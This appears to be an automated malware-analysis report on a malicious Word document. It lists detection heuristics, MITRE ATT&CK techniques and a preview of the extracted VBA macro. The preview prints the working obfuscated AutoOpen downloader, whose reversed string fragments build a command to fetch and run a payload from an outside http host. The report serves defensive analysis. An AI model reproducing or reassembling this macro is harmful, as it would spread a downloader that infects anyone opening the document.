MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and configured to execute code, which is further supported by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic. This strongly suggests the macro is designed to download and execute a secondary payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21707 bytes |
SHA-256: 041e8d07bf076adc8f8c9bcb968115751f6fdc290153aa254c68d49d818188d7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDtHfij"
Sub AutoOpen()
On Error Resume Next
iuiGBRCbK = BwQdTfuRM - cXJaXpKHKqic / (5254674 + NXIUEBfzYHfCj - 6029576 + ccbawZG)
lIjMGuQUf = UbQvXZMKFd - BvVGfFiOGBcOGm / (24915 + suliDbFhHOFF - 547282 + QtvHjMOFb)
oiGZXsMKJ = nUPUvvapnw - zcLrliSzC / (7577338 + mTwzzCipvE - 9269593 + OuAZALJXaGLp)
Application.Run "wihcaNbIj", nJSrrFIEIQ
GvhmJtKHj = hwYvwXHwD - DuwwkJSn / (8689463 + wjHHtCUwf - 362509 + owwNEBFNlPcDzl)
MwkBAbXOT = BoQBvDLSBR - vzjjHMaHA / (3791744 + IVhDjuiaWaf - 5787371 + PkDRhEJB)
End Sub
Function nJSrrFIEIQ()
On Error Resume Next
DsnKEzWoJ = icGUWGHc - IsWtsiaoVjIHzW / (3413779 + ZiLBYAQRfY - 3438448 + RmqRuQWRumH)
ulqPWcvCBm = sBOzcAlF - zwYwbbHcFOUMw / (4290745 + trNjAAanaBIW - 7381407 + oinMnRqRV)
nHWdSk = oOpoXnztf - GlnEFoZJzvT / (1027238 + LRjhALEsbW - 8995026 + mLmPnDOrHKCri)
sbfwLcQoBcF = ZXQiKQjAoTpkil + Mid(StrReverse("oijpOQ'+'E1N}ExbV+xbV1N+E1N}{hctaE1N+E1Nc};kE1N+EQudSzVITGWQMCzzNiZYkWkshAk"), 27, 43)
dBFojMoZ = WoFwiamiPsM - dmuJsEOOA / (2995941 + wtMLMGwvIthQb - 6577476 + jQUfmwVn)
aCODizLb = GmLhuVidGv - DVPZYTwE / (4948394 + WSblYwtUdtdFrF - 5125536 + PBnOEJfbDKAvHS)
EaXFwLdiT = ROZjTkw - WlIdCdziJw / (5564654 + vRLrNnz - 6562943 + zwNKrLrRV)
pDPmBZjkLK = wsjUZzjs + Mid(StrReverse("NItDxbV+E1N CDE1N+E1NSJ5v;)icOdUIlNWlAt"), 13, 23)
vVJkRsihX = FfrwiOGADiWfkN - ZmvTLRGN / (7672462 + RkRBhviKBchGB - 6642649 + kLojzcaFVqqAMR)
zZrENViIb = zSDEMdozVmoU - lbTkMXaFSdoP / (8272710 + vKrvVtVdPCw - 4163287 + wMSzLHrUu)
ksUYWWnb = FnoqajoOpV - toirSbNHMQorGi / (8601795 + jdHzLAnlHhCuwa - 7680556 + zTCYoGsf)
oRQpRvAi = LTiQdvfc + Mid(StrReverse("MWnwaMqVBjSuN/moE1NxbV+xbV+E1Nc.gnirE1N+E1NXODjVnfWXdHsV"), 14, 31)
anfSIwqXZb = WmsBsjkYTKlc - rncULakcVzSj / (3840403 + zqLPRCZd - 6253050 + WvWHHKBw)
jsmsaUJT = kFvkNWhAFBn - UYZliHvTaHO / (1251862 + zPEdUKzVD - 6773548 + EGwskBT)
hnjpooODGW = sjCWwWYCFcD - roSQGdXkqpE / (3277166 + UhcJCjYnmNiut - 1571700 + wIrszFNP)
EGdvHftastw = MiGRwiMihIl + Mid(StrReverse("wmoTWQzDcnd05]rAhC[+98]rAhCunDWaW"), 7, 16)
bSHaRVRhHtf = CtfpEbjVNUQoi - MRjHRocQctFBKE / (1773261 + jRzQozUQ - 1661671 + EMYmOtCERUwTY)
NTIOPUw = QlQlkCQi - BowoSJNw / (3809323 + cjPsqfLzFmoPMt - 8513906 + CijfFYazXzPFkv)
khpWdlWjw = YcUvXAt - FZDKsXlbEw / (3505442 + iMotDJPV - 8626826 + FOKhQmswU)
ljOqYhj = hlHiikDiljbpw + Mid(StrReverse("qjSZDzFVGUHNtRwwsJWnldGIflBiRLqEUsr2E1N+E1N'+'YceE1N+E1Njbo-wr2Y+ucJ+ucJHE"), 3, 38)
tWBTVkHcd = LobrOkXhqTo - KHwjGcS / (9470395 + jiqqbnjWEz - 9309262 + HEwQGGPlbn)
iRikRY = NMXVmnEjzrFc - lBmwoKl / (4276505 + fDCASAVDLtvwc - 5781235 + SwjARwd)
kUMprnAm = csfFTSz - CPVhUSmUE / (2022959 + fLhJIXiirbkFvB - 227204 + InuBlOcsjGw)
wiwpN = JIdFCNhclWKISo + Mid(StrReverse("jrDsOPihpcK[((e'+'cALpeR.)MjjrPXZwujMhLjHXPqWPEnAiHQdJ"), 29, 15)
YwZoG = oGpSKafTsdjJ - KRjocBaw / (5878472 + MnwuDLfZRMQz - 1477449 + aVjRQHjhnzqj)
TRsPI = GFUInJZ - iLfbINEPwsN / (1949691 + NGVIiXAiAAEXEY - 3817593 + EcniJwKApIucSr)
LbJaiYuk = cVIswzz - mZwiLbE / (646080 + kTsPacoRwUTZd - 4549665 + JvbBwjUw)
uzapLSjvnBk = zKOwGAzquiWi + Mid(StrReverse("QwbE1N5v + ucJ+ucJr2YY'+'E1N+E1NixbV+xbVlr2YE1N+E1N +E1xbV+xbVN+E1N cix'+'bV+xbVE1N+xbV+xbucJ+ucJVE1NlbxbV+xbVup:vneJ5v =E1NxbV+AVXkMilJawaCjilJPKSjpLBKk"), 26, 125)
CMMcAEmnFI = EFswwpCtUbCf - fIBlUPzCHIP / (4438398 + sYTdzzuiVXfOK - 1196117 + HbESQYrsGZ)
MIwidAajMw = jZizzcbLwdarbE - wKlWXKJavfDw / (1181767 + AjNDCOVAX - 4974208 + mwJvhkc)
kPcESS = jahGkCmaw - RufVzvzMoZpP / (9612099 + LTkMzfNvaiZn - 3753293 + dAPoWNFfWR)
XfiZaRK = XBILSwZ + Mid(StrReverse("mldob/6E1N+E1NKE1N+E1N53/mocE1N+E1N.'+'42eziE1N+E1Ng/E1N+E1N/:ptth '+'r2Y E1N+E1N= E1N+E1NXE1N+E1NCDE1N+ExbV+xbV1NAJE1N+E1N5v;)E1N+E1N331282 ,ucJ+ucJ00wCIcGrcRbZAtUQq"), 16, 146)
trSADE = uvQSaaTYVTz - JcYjnKBtkjfwTL / (7221356 + tAXJILYiMipN -
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.